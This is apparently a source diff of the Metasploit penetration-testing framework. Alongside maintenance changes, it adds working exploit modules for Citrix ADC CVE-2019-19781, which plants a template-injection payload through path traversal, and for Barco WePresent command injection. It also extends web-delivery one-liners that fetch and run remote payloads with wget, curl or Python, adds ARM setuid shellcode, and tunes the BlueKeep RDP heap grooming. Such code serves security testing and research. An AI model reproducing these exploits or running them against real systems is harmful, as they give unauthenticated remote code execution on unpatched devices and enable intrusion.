documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md

@@ -90,3 +90,13 @@ The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/m
   meterpreter > 
   ```
 
+## Re-exploitation
+
+The exploit C code utilizes a defined send (`5555`) and receive (`6666`) port, which are opened while the payload is active.
+Attempt to re-exploit while a successful exploit payload is open will result in the error:
+
+```
+[*] Could not bind socket.
+```
+
+However, killing that payload will allow for the exploit to run successfully.

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "5.0.67"
+      VERSION = "5.0.69"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/core/auxiliary/login.rb

@@ -136,7 +136,7 @@ module Auxiliary::Login
   def password_prompt?(username=nil)
     return true if(@recvd =~ @password_regex)
     if username
-      return true if( !(username.empty?) and @recvd =~ /#{username}'s/)
+      return true if !(username.empty?) and @recvd.to_s.include?("#{username}'s")
     end
     return false
   end

lib/msf/core/exploit/check_module.rb

@@ -43,7 +43,7 @@ module Exploit::Remote::CheckModule
     res = mod.run_simple(
       'LocalInput'  => user_input,
       'LocalOutput' => user_output,
-      'Options'     => datastore.to_h.slice('RHOSTS', 'RHOST', 'RPORT')
+      'Options'     => datastore # XXX: This clobbers the datastore!
     )
 
     # Ensure return value is a CheckCode

lib/msf/core/exploit/http/client.rb

@@ -42,7 +42,7 @@ module Exploit::Remote::HttpClient
         Opt::SSLVersion,
         OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]),
         OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']),
-        OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']),
+        OptFloat.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']),
         OptBool.new('HttpPartialResponses', [false, 'Return partial HTTP responses despite timeouts', false]),
         OptBool.new('HttpTrace', [false, 'Show the raw HTTP requests and responses', false])
       ], self.class

lib/msf/core/exploit/rdp.rb

@@ -477,6 +477,15 @@ module Exploit::Remote::RDP
     rdp_send(rdp_build_pkt(pdu_client_font_list))
   end
 
+  def rdp_move_mouse(x = 1, y = 1)
+    mouse_move_blob = ""
+    mouse_move_blob << "\x04\x80\x0a"    # copypasta FAST PATH stuff from xfreerdp
+    mouse_move_blob << "\x20"            # TS_FP_INPUT_EVENT::eventHeader = 0x20 (FASTPATH_INPUT_EVENT_MOUSE)
+    mouse_move_blob << "\x00\x08"        # TS_FP_POINTER_EVENT::pointerFlags  = 0x0800 (PTRFLAGS_MOVE)
+    mouse_move_blob << [x, y].pack('vv') # TS_FP_POINTER_EVENT::xPos, TS_FP_POINTER_EVENT::yPos
+    rdp_send(mouse_move_blob)
+  end
+
   #
   # Protocol parsers
   #
@@ -1274,7 +1283,6 @@ protected
     result
   end
 
-
   def cs_core_data(
     version: 0x80004,
     width: 800,
@@ -1289,7 +1297,7 @@ protected
     client_product_id: 1,
     client_dig_product_id: "",
     selected_proto: 0
-  )
+    )
 
     client_name = Rex::Text.to_unicode(client_name[0..16], 'utf-16le')
     client_dig_product_id = Rex::Text.to_unicode(client_dig_product_id[0..32], 'utf-16le')

lib/msf/core/payload/linux.rb

@@ -429,6 +429,21 @@ module Msf::Payload::Linux
         app << "\x58"                 #    pop     rax                       #
         app << "\x0f\x05"             #    syscall                           #
       end
+    elsif (test_arch.include?(ARCH_ARMLE))
+      if (datastore['PrependSetuid'])
+        # setuid(0)
+        pre << "\x00\x00\x20\xe0"     #    eor r0, r0, r0                    #
+        pre << "\x17\x70\xa0\xe3"     #    mov r7, #23                       #
+        pre << "\x00\x00\x00\xef"     #    svc                               #
+      end
+      if (datastore['PrependSetresuid'])
+        # setresuid(ruid=0, euid=0, suid=0)
+        pre << "\x00\x00\x20\xe0"     #    eor r0, r0, r0                    #
+        pre << "\x01\x10\x21\xe0"     #    eor r1, r1, r1                    #
+        pre << "\x02\x20\x22\xe0"     #    eor r2, r2, r2                    #
+        pre << "\xa4\x70\xa0\xe3"     #    mov r7, #0xa4                     #
+        pre << "\x00\x00\x00\xef"     #    svc                               #
+      end
     end
 
     return (pre + buf + app)

lib/msf/ui/console/command_dispatcher/payload.rb

@@ -170,7 +170,7 @@ module Msf
 
             if !ofile
               # Display generated payload
-              print(buf)
+              puts(buf)
             else
               print_status("Writing #{buf.length} bytes to #{ofile}...")
               fd = File.open(ofile, "wb")

lib/rex/parser/openvas_nokogiri.rb

@@ -78,31 +78,44 @@ module Parser
     when 'port'
       if in_tag('result')
         @state[:has_text] = true
-        if @text && @text.index('(')
-          @state[:proto] = @text.split('(')[1].split('/')[1].gsub(/\)/, '')
-          @state[:port] = @text.split('(')[1].split('/')[0].gsub(/\)/, '')
-        elsif @text && @text.index('/')
-          @state[:proto] = @text.split('/')[1].strip
-          @state[:port] = @text.split('/')[0].strip
-        else
-          @state[:proto] = nil
-          @state[:port] = nil
-        end
+        if @text
+          if /^(?<p_num>\d{1,5})\/(?<p_proto>.+)\s\((?<p_name>.+)\)/ =~ @text
+            @state[:name] = p_name.gsub(/iana: /i, '')
+            @state[:port] = p_num
+            @state[:proto] = p_proto
+          elsif @text.index('(')
+            @state[:proto] = @text.split('(')[1].split('/')[1].gsub(/\)/, '')
+            @state[:port] = @text.split('(')[1].split('/')[0].gsub(/\)/, '')
+          elsif @text.index('/')
+            @state[:proto] = @text.split('/')[1].strip
+            @state[:port] = @text.split('/')[0].strip
+          else
+            @state[:proto] = nil
+            @state[:port] = nil
+          end
 
-        if @state[:port] && @state[:port] == 'general'
-          @state[:proto] = nil
-          @state[:port] = nil
+          if @state[:port] && @state[:port] == 'general'
+            @state[:proto] = nil
+            @state[:port] = nil
+          end
         end
       elsif in_tag('ports')
-        if @text && @text.index('(')
-          @state[:name] = @text.split(' ')[0]
-          @state[:port] = @text.split('(')[1].split('/')[0]
-          @state[:proto] = @text.split('(')[1].split('/')[1].split(')')[0]
-          record_service unless @state[:name].nil?
-        elsif @text && @text.index('/')
-          @state[:port] = @text.split('/')[0]
-          @state[:proto] = @text.split('/')[1]
-          record_service unless @state[:port] == 'general'
+        if @text
+          if /^(?<p_num>\d{1,5})\/(?<p_proto>.+)\s\((?<p_name>.+)\)/ =~ @text
+            @state[:name] = p_name.gsub(/iana: /i, '')
+            @state[:port] = p_num
+            @state[:proto] = p_proto
+            record_service if p_num
+          elsif @text.index('(')
+            @state[:name] = @text.split(' ')[0]
+            @state[:port] = @text.split('(')[1].split('/')[0]
+            @state[:proto] = @text.split('(')[1].split('/')[1].split(')')[0]
+            record_service unless @state[:name].nil?
+          elsif @text.index('/')
+            @state[:port] = @text.split('/')[0]
+            @state[:proto] = @text.split('/')[1]
+            record_service unless @state[:port] == 'general'
+          end
         end
       end
     when 'name'

modules/auxiliary/gather/pulse_secure_file_disclosure.rb

@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
       'DefaultOptions'      => {
         'RPORT'             => 443,
         'SSL'               => true,
-        'HttpClientTimeout' => 5 # This seems sane, but it's not a float
+        'HttpClientTimeout' => 5 # This seems sane
       },
       'Notes'               => {
         'Stability'         => [CRASH_SAFE],
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Auxiliary
     files.each do |path, info|
       print_status("Dumping #{path}")
 
-      res = send_request_raw(
+      res = send_request_cgi(
         'method'  => 'GET',
         'uri'     => dir_traversal(path),
         'partial' => true # Allow partial response due to timeout

modules/auxiliary/scanner/http/citrix_dir_traversal.rb

@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Citrix ADC (NetScaler) Directory Traversal Scanner',
+      'Description'    => %{
+        This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC
+        (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request
+        /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of
+        a "[global]" directive in smb.conf, which this file should always contain.
+      },
+      'Author'         => [
+        'Erik Wynter', # Module (@wyntererik)
+        'altonjx'      # Module (@altonjx)
+      ],
+      'References'     => [
+        ['CVE', '2019-19781'],
+        ['URL', 'https://support.citrix.com/article/CTX267027/']
+      ],
+      'DisclosureDate' => '2019-12-17',
+      'License'        => MSF_LICENSE,
+      'Notes'          => {
+        'AKA'          => ['Shitrix']
+      }
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('PATH',      [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])
+    ])
+  end
+
+  def run_host(target_host)
+    turi = normalize_uri(target_uri.path, datastore['PATH'])
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    =>  turi
+    )
+
+    unless res
+      print_error("#{full_uri(turi)} - No response, target seems down.")
+
+      return Exploit::CheckCode::Unknown
+    end
+
+    unless res.code == 200
+      print_error("#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.")
+      vprint_error("Obtained HTTP response code #{res.code} for #{full_uri(turi)}.")
+
+      return Exploit::CheckCode::Safe
+    end
+
+    if turi.end_with?('smb.conf')
+      unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.include?('[global]')
+        vprint_warning("#{turi} does not contain \"[global]\" directive.")
+      end
+    end
+
+    print_good("#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.")
+    msg = "Obtained HTTP response code #{res.code} for #{full_uri(turi)}. " \
+          "This means that access to #{turi} was obtained via directory traversal."
+    vprint_good(msg)
+
+    report_vuln(
+      host: target_host,
+      name: name,
+      refs: references,
+      info: msg
+    )
+
+    Exploit::CheckCode::Vulnerable
+  end
+
+end

modules/exploits/linux/http/citrix_dir_traversal_rce.rb

@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::CheckModule
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'                => 'Citrix ADC (NetScaler) Directory Traversal RCE',
+      'Description'         => %q{
+        This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka
+        NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.
+      },
+      'Author'              => [
+        'Project Zero India',           # PoC used by this module
+        'TrustedSec',                   # PoC used by this module
+        'James Brytan',                 # PoC contributed independently
+        'James Smith',                  # PoC contributed independently
+        'Marisa Mack',                  # PoC contributed independently
+        'Rob Vinson',                   # PoC contributed independently
+        'Sergey Pashevkin',             # PoC contributed independently
+        'Steven Laura',                 # PoC contributed independently
+        'mekhalleh (RAMELLA Sébastien)' # Module author (https://www.pirates.re/)
+      ],
+      'References'          => [
+        ['CVE', '2019-19781'],
+        ['EDB', '47901'],
+        ['EDB', '47902'],
+        ['URL', 'https://support.citrix.com/article/CTX267027/'],
+        ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/']
+      ],
+      'DisclosureDate'      => '2019-12-17',
+      'License'             => MSF_LICENSE,
+      'Platform'            => ['python', 'unix'],
+      'Arch'                => [ARCH_PYTHON, ARCH_CMD],
+      'Privileged'          => false,
+      'Targets'             => [
+        ['Python',
+          'Platform'        => 'python',
+          'Arch'            => ARCH_PYTHON,
+          'Type'            => :python,
+          'DefaultOptions'  => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}
+        ],
+        ['Unix Command',
+          'Platform'        => 'unix',
+          'Arch'            => ARCH_CMD,
+          'Type'            => :unix_command,
+          'DefaultOptions'  => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
+        ]
+      ],
+      'DefaultTarget'       => 0,
+      'DefaultOptions'      => {
+        'CheckModule'       => 'auxiliary/scanner/http/citrix_dir_traversal',
+        'HttpClientTimeout' => 3.5
+      },
+      'Notes'               => {
+        'AKA'               => ['Shitrix'],
+        'Stability'         => [CRASH_SAFE],
+        'Reliability'       => [REPEATABLE_SESSION],
+        'SideEffects'       => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+  end
+
+  def cmd_unix_generic?
+    datastore['PAYLOAD'] == 'cmd/unix/generic'
+  end
+
+  def exploit
+    unless datastore['ForceExploit']
+      case check
+      when CheckCode::Vulnerable
+        print_good('The target appears to be vulnerable')
+      when CheckCode::Safe
+        fail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable')
+      else
+        fail_with(Failure::Unknown, 'The target vulnerability state is unknown')
+      end
+    end
+
+    print_status("Yeeting #{datastore['PAYLOAD']} payload at #{peer}")
+    vprint_status("Generated payload: #{payload.encoded}")
+
+    case target['Type']
+    when :python
+      execute_command(%(/var/python/bin/python2 -c "#{payload.encoded}"))
+    when :unix_command
+      if (res = execute_command(payload.encoded)) && cmd_unix_generic?
+        print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))
+      end
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    filename = rand_text_alpha(8..42)
+    nonce    = rand_text_alpha(8..42)
+
+    res = send_request_cgi(
+      'method'      => 'POST',
+      'uri'         => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),
+      'headers'     => {
+        'NSC_USER'  => "../../../netscaler/portal/templates/#{filename}",
+        'NSC_NONCE' => nonce
+      },
+      'vars_post'   => {
+        'url'       => rand_text_alpha(8..42),
+        'title'     => "[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]"
+      }
+    )
+
+    unless res && res.code == 200
+      print_error('No response to POST newbm.pl request')
+      return
+    end
+
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri.path, "/vpn/../vpns/portal/#{filename}.xml"),
+      'headers'     => {
+        'NSC_USER'  => rand_text_alpha(8..42),
+        'NSC_NONCE' => nonce
+      },
+      'partial'     => true
+    )
+
+    unless res && res.code == 200
+      print_warning("No response to GET #{filename}.xml request")
+    end
+
+    register_files_for_cleanup(
+      "/netscaler/portal/templates/#{filename}.xml",
+      "/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2"
+    )
+
+    res
+  end
+
+  def chr_payload(cmd)
+    cmd.each_char.map { |c| "chr(#{c.ord})" }.join('.')
+  end
+
+end

modules/exploits/linux/http/webmin_backdoor.rb

@@ -9,6 +9,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Module::Deprecated
+
+  moved_from 'exploit/unix/webapp/webmin_backdoor'
 
   def initialize(info = {})
     super(update_info(info,

modules/exploits/linux/http/wepresent_cmd_injection.rb

@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Barco WePresent file_transfer.cgi Command Injection",
+      'Description'    => %q(
+        This module exploits an unauthenticated remote command injection
+        vulnerability found in Barco WePresent and related OEM'ed products.
+        The vulnerability is triggered via an HTTP POST request to the
+        file_transfer.cgi endpoint.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         => 'Jacob Baines', # @Junior_Baines'
+      'References'     =>
+        [
+          ['CVE', '2019-3929'],
+          ['EDB', '46786'],
+          ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
+        ],
+      'DisclosureDate' => "Apr 30, 2019",
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Unix In-Memory',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {
+           'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
+         }],
+        ['Linux Dropper',
+         'Platform'        => 'linux',
+         'Arch'            => ARCH_ARMLE,
+         'CmdStagerFlavor' => ['printf', 'wget'],
+         'Type'            => :linux_dropper]
+      ],
+      'DefaultTarget'  => 1,
+      'DefaultOptions' => {
+        'SSL'               => true,
+        'RPORT'             => 443,
+        'CMDSTAGER::FLAVOR' => 'printf',
+        'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp'
+      }))
+  end
+
+  def filter_bad_chars(cmd)
+    cmd.gsub!(/;/, 'Pa_Note')
+    cmd.gsub!(/\+/, 'Pa_Add')
+    cmd.gsub!(/&/, 'Pa_Amp')
+    return cmd
+  end
+
+  def send_command(cmd, timeout)
+    vars_post = {
+      file_transfer: 'new',
+      dir: "'#{filter_bad_chars(cmd)}'"
+    }
+
+    send_request_cgi({
+      'uri'       => '/cgi-bin/file_transfer.cgi',
+      'method'    => 'POST',
+      'vars_post' => vars_post
+    }, timeout)
+  end
+
+  def check
+    check_resp = send_command(";whoami;", 5)
+    unless check_resp
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    if check_resp.code == 200
+      check_resp.body.gsub!(/[\r\n]/, "")
+      if check_resp.body == "root"
+        return CheckCode::Vulnerable
+      end
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_command(";(#{cmd})&", nil)
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(linemax: 128)
+    end
+  end
+end

modules/exploits/multi/script/web_delivery.rb

@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'],
           ['URL', 'https://iwantmore.pizza/posts/amsi.html'],
         ],
-      'Platform'       => %w(python php win linux),
+      'Platform'       => %w(python php win linux osx),
       'Targets'        =>
         [
           ['Python', {
@@ -100,7 +100,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ['Linux', {
             'Platform' => 'linux',
             'Arch' => [ARCH_X86, ARCH_X64]
-          }]
+          }],
+          ['Mac OS X', {
+            'Platform' => 'osx',
+            'Arch' => [ARCH_X86, ARCH_X64]
+          }],
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 19 2013'
@@ -120,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def primer
     php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));")
-    python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());")
+    python = %Q(python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}', context=ssl._create_unverified_context());exec(r.read());")
     regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
     pubprn = %Q(C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script:#{get_uri}.sct)
 
@@ -143,7 +147,10 @@ class MetasploitModule < Msf::Exploit::Remote
       print_line("#{psh}")
     when 'Linux'
       fname = Rex::Text.rand_text_alphanumeric 8
-      print_line "wget -qO #{fname} --no-check-certificate #{get_uri}; chmod +x #{fname}; ./#{fname}&"
+      print_line "wget -qO #{fname} --no-check-certificate #{get_uri}; chmod +x #{fname}; ./#{fname}& disown"
+    when 'Mac OS X'
+      fname = Rex::Text.rand_text_alphanumeric 8
+      print_line "curl -sk --output #{fname} #{get_uri}; chmod +x #{fname}; ./#{fname}& disown"
     end
   end
 
@@ -166,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     case target.name
-    when 'Linux'
+    when 'Linux', 'Mac OS X'
       data = generate_payload_exe
     when 'PSH (Binary)'
       data = generate_payload_exe

modules/exploits/windows/http/efs_fmws_userid_bof.rb

@@ -75,7 +75,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     version = nil
     res = send_request_raw({'uri' => '/whatsnew.txt'})
-    if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
+
+    unless res
+      vprint_error 'Connection failed'
+      return nil
+    end
+
+    if res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/
       version = $1
       vprint_status "Found version: #{version}"
     elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/

modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

@@ -200,6 +200,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),
         OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),
         OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),
+        OptFloat.new('GROOMDELAY', [false, 'Delay in seconds between sending 1 MB of groom packets', 0])
       ]
     )
   end
@@ -276,6 +277,9 @@ private
     spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)
     free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80
 
+    # if the exploit is cancelled during the free, target computer will explode
+    print_warning("<---------------- | Entering Danger Zone | ---------------->")
+
     print_status("Surfing channels ...")
     rdp_send(spray_channel * 1024)
     rdp_send(free_trigger)
@@ -293,7 +297,9 @@ private
 
     groom_mb = groom_size * 1024 / payloads.length
 
-    groom_mb.times do
+    groom_start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)
+
+    groom_mb.times do |current_groom_count|
       tpkts = ''
       for c in 0..groom_chan_count
         payloads.each do |p|
@@ -301,10 +307,35 @@ private
         end
       end
       rdp_send(tpkts)
+
+      # tasks we do every 1 MB
+      if current_groom_count % (1024 / payloads.length) == 0
+
+        # adding mouse move events keeps the connection alive
+        # (this handles a groom duration > 30 seconds, such as over Internet/VPN)
+        rdp_move_mouse
+
+        # simulate slow connection if GROOMDELAY is set
+        if datastore['GROOMDELAY'] && datastore['GROOMDELAY'] > 0
+          sleep(datastore['GROOMDELAY'])
+        end
+
+        groom_current_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)
+        groom_elapsed_time = groom_current_time - groom_start_time
+        groom_elapsed_str = "%02d:%02d:%02d" % [groom_elapsed_time / 3600,
+                                                groom_elapsed_time / 60%60,
+                                                groom_elapsed_time % 60]
+
+        groom_mb_sent = current_groom_count / (1024 / payloads.length) + 1
+        vprint_status("Sent #{groom_mb_sent}/#{groom_size} MB. (Time elapsed: #{groom_elapsed_str})")
+      end
     end
 
     # Terminating and disconnecting forces the USE
     print_status("Forcing the USE of FREE'd object ...")
+
+    # target is groomed, the early cancellation dangers are complete
+    print_warning("<---------------- | Leaving Danger Zone | ---------------->")
     rdp_terminate
     rdp_disconnect
   end